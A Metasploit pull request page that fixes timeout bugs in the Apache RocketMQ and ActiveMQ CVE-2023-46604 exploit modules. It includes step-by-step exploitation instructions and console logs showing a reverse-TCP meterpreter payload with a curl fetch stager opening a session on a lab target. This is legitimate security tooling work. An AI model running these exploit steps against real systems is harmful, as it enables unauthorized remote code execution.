
Apache RocketMQ & ActiveMQ fixes #19141

Merged
merged 5 commits into from Apr 29, 2024

Conversation

jheysel-r7

Fixes a timeout issue that was being seen when running the following modules:

  • modules/exploits/multi/http/apache_rocketmq_update_config.rb
  • modules/exploits/multi/misc/apache_activemq_rce_cve_2023_46604.rb

Once this PR is landed we should be able to close #19037 & #19038

Verification

RocketMQ

  1. Start msfconsole.
  2. Do: use exploit/multi/http/apache_rocketmq_update_config.
  3. Set the RHOST and LHOST options.
  4. Run the module.
  5. Receive a session in the context of the user running the RocketMQ application.

ActiveMQ

Steps (Linux target):

  1. Start msfconsole
  2. use exploit/multi/misc/apache_activemq_rce_cve_2023_46604
  3. set RHOST <LINUX_TARGET_IP>
  4. set SRVHOST eth0
  5. set target 1
  6. set PAYLOAD cmd/linux/http/x64/meterpreter/reverse_tcp
  7. check
  8. exploit

Ensure neither module hangs, times out or errors in any unexpected way (they shouldn't).

Testing

RocketMQ

msf6 exploit(multi/http/apache_rocketmq_update_config) > options

Module options (exploit/multi/http/apache_rocketmq_update_config):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   BROKER_PORT  10911            no        The RocketMQ Broker port. If left unset the module will attempt to retrieve the Broker port from the NameServer response (recommended)
   CHOST                         no        The local client address
   CPORT                         no        The local client port
   Proxies                       no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS       127.0.0.1        yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT        9876             yes       The RocketMQ NameServer port (TCP)
   SSL          false            no        Negotiate SSL for incoming connections
   SSLCert                       no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                       no        The URI to use for this exploit (default is random)


   When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.


Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   FETCH_COMMAND       CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
   FETCH_FILENAME      ezCLiIlwE        no        Name to use on remote system when storing payload; cannot contain spaces or slashes
   FETCH_SRVHOST                        no        Local IP to use for serving payload
   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
   FETCH_URIPATH                        no        Local URI to use for serving payload
   FETCH_WRITABLE_DIR                   yes       Remote writable dir to store payload; cannot contain spaces
   LHOST               172.16.199.1     yes       The listen address (an interface may be specified)
   LPORT               4434             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic (Unix In-Memory)



View the full module info with the info, or info -d command.

msf6 exploit(multi/http/apache_rocketmq_update_config) > rexploit
[*] Reloading module...

[*] Started reverse TCP handler on 172.16.199.1:4434
[*] 127.0.0.1:9876 - Running automatic check ("set AutoCheck false" to disable)
[+] 127.0.0.1:9876 - The target appears to be vulnerable. RocketMQ version: 4.9.4
[*] 127.0.0.1:9876 - autodetection failed, assuming default port of 10911
[*] 127.0.0.1:9876 - Executing target: Automatic (Unix In-Memory) with payload cmd/linux/http/x64/meterpreter/reverse_tcp on Broker port: 10911
[*] Sending stage (3045380 bytes) to 172.16.199.1
[*] 127.0.0.1:9876 - Removing the payload from where it was injected into $ROCKETMQ_HOME. The FilterServerManager class will execute the payload every 30 seconds until this is reverted
[+] 127.0.0.1:9876 - Determined the original $ROCKETMQ_HOME: /home/rocketmq/rocketmq-4.9.4
[*] 127.0.0.1:9876 - Re-running the exploit in order to reset the proper $ROCKETMQ_HOME value
[*] Meterpreter session 11 opened (172.16.199.1:4434 -> 172.16.199.1:59206) at 2024-04-26 14:09:31 -0700

meterpreter > getuid
Server username: rocketmq
meterpreter > sysinfo
Computer     : 172.17.0.3
OS           : CentOS 7.9.2009 (Linux 6.6.22-linuxkit)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > exit
[*] Shutting down session: 11

[*] 127.0.0.1 - Meterpreter session 11 closed.  Reason: User exit

ActiveMQ

msf6 exploit(multi/misc/apache_activemq_rce_cve_2023_46604) > options

Module options (exploit/multi/misc/apache_activemq_rce_cve_2023_46604):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS   127.0.0.1        yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT    61616            yes       The target port (TCP)
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)


Payload options (cmd/unix/reverse_perl):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  172.16.199.1     yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   2   Unix



View the full module info with the info, or info -d command.

msf6 exploit(multi/misc/apache_activemq_rce_cve_2023_46604) > check
[*] 127.0.0.1:61616 - The target appears to be vulnerable. Apache ActiveMQ 5.15.6

@smcintyre-r7 smcintyre-r7 self-assigned this Apr 29, 2024

@smcintyre-r7 smcintyre-r7 left a comment


I went and tested this against an HTTPS server again, and the #timed_read method returns nil when it times out so I made some suggestions to accommodate that.

lib/msf/core/auxiliary/rocketmq.rb
Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com>
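The comment above notes that #timed_read returns nil on timeout, so a version probe has to treat nil as "no answer" rather than as data. The following is an added illustration, not code from this PR or from Metasploit: timed_read here is a hypothetical stand-in with the same nil-on-timeout contract, and it parses a constructed text banner rather than the real RocketMQ wire format.

```ruby
require 'socket'

# Hypothetical stand-in for a timed read: returns nil on timeout or EOF
# instead of raising, so the caller must handle nil explicitly.
READ_CHUNK = 4096

# Wait up to +timeout+ seconds for +io+ to become readable; nil on timeout/EOF.
def timed_read(io, length = READ_CHUNK, timeout = 2.0)
  return nil unless IO.select([io], nil, nil, timeout)
  io.readpartial(length)
rescue EOFError, IOError
  nil
end

# Extract a dotted version from a constructed RocketMQ-style text banner.
# Returns nil for nil input (timeout) or for data from some other service
# (e.g. an HTTPS listener answering the probe with an HTTP error).
def parse_version(data)
  return nil if data.nil?
  m = data.match(/RocketMQ version:\s*V?(\d+(?:\.\d+)+)/)
  m && m[1]
end

# Probe result in the shape of the module's check output: a version is
# reported only when one was actually parsed; silence or foreign data
# yields :unknown quickly instead of hanging.
def probe_version(io, timeout: 2.0)
  version = parse_version(timed_read(io, READ_CHUNK, timeout))
  if version
    [:detected, "RocketMQ version: #{version}"]
  else
    [:unknown, 'Cannot reliably check exploitability. Unable to determine the version']
  end
end

if __FILE__ == $PROGRAM_NAME
  r, w = IO.pipe
  w.write("RocketMQ version: V4.9.4\n") # constructed banner, not real protocol data
  p probe_version(r, timeout: 0.5)
  r2, _w2 = IO.pipe                        # nothing written: simulates a silent host
  p probe_version(r2, timeout: 0.2)
end
```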

@smcintyre-r7 smcintyre-r7 left a comment


Thanks @jheysel-r7, I just ran through the tests and things are looking much better now. I confirmed that apache_rocketmq_update_config is still executing its payload and its check method is much faster now when targeting an HTTPS server:

metasploit-framework (S:0 J:0) exploit(multi/http/apache_rocketmq_update_config) > check
[*] 18.220.174.0:9876 - The target appears to be vulnerable. RocketMQ version: 4.9.4
metasploit-framework (S:0 J:0) exploit(multi/http/apache_rocketmq_update_config) > check https://zerosteiner.com
[*] 192.168.249.3:443 - Cannot reliably check exploitability. Unable to determine the version

auxiliary/scanner/misc/rocketmq_version is also still working and much faster when targeting an invalid server.

metasploit-framework (S:0 J:0) auxiliary(scanner/misc/rocketmq_version) > set RHOSTS 18.220.174.0
RHOSTS => 18.220.174.0
metasploit-framework (S:0 J:0) auxiliary(scanner/misc/rocketmq_version) > run

[+] 18.220.174.0:9876     - RocketMQ version V4.9.4 found with brokers: [{"brokerAddrs"=>{"0"=>"172.17.0.3:10911"}, "brokerName"=>"broker-a", "cluster"=>"DefaultCluster"}]
[*] 18.220.174.0:9876     - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
metasploit-framework (S:0 J:0) auxiliary(scanner/misc/rocketmq_version) > run https://zerosteiner.com

[-] 192.168.249.3:443     - Invalid or no response received
[*] https://zerosteiner.com:9876 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
metasploit-framework (S:0 J:0) auxiliary(scanner/misc/rocketmq_version) > 

Finally, exploit/multi/misc/apache_activemq_rce_cve_2023_46604 is much faster when targeting an HTTPS server.

metasploit-framework (S:0 J:0) exploit(multi/misc/apache_activemq_rce_cve_2023_46604) > time check https://zerosteiner.com
[*] 192.168.249.3:443 - Cannot reliably check exploitability.
[+] Command "check https://zerosteiner.com" completed in 10.14058061500009 seconds
metasploit-framework (S:0 J:0) exploit(multi/misc/apache_activemq_rce_cve_2023_46604) >
metasploit-framework (S:0 J:0) exploit(multi/misc/apache_activemq_rce_cve_2023_46604) > check
[*] 18.220.174.0:61616 - The target appears to be vulnerable. Apache ActiveMQ 5.18.2
metasploit-framework (S:0 J:0) exploit(multi/misc/apache_activemq_rce_cve_2023_46604) >

@smcintyre-r7 smcintyre-r7 merged commit 4341862 into rapid7:master Apr 29, 2024
48 checks passed
@smcintyre-r7

Release Notes

This fixes timeout issues encountered by rocketmq and activemq modules that would occur when the target is not running the expected service.
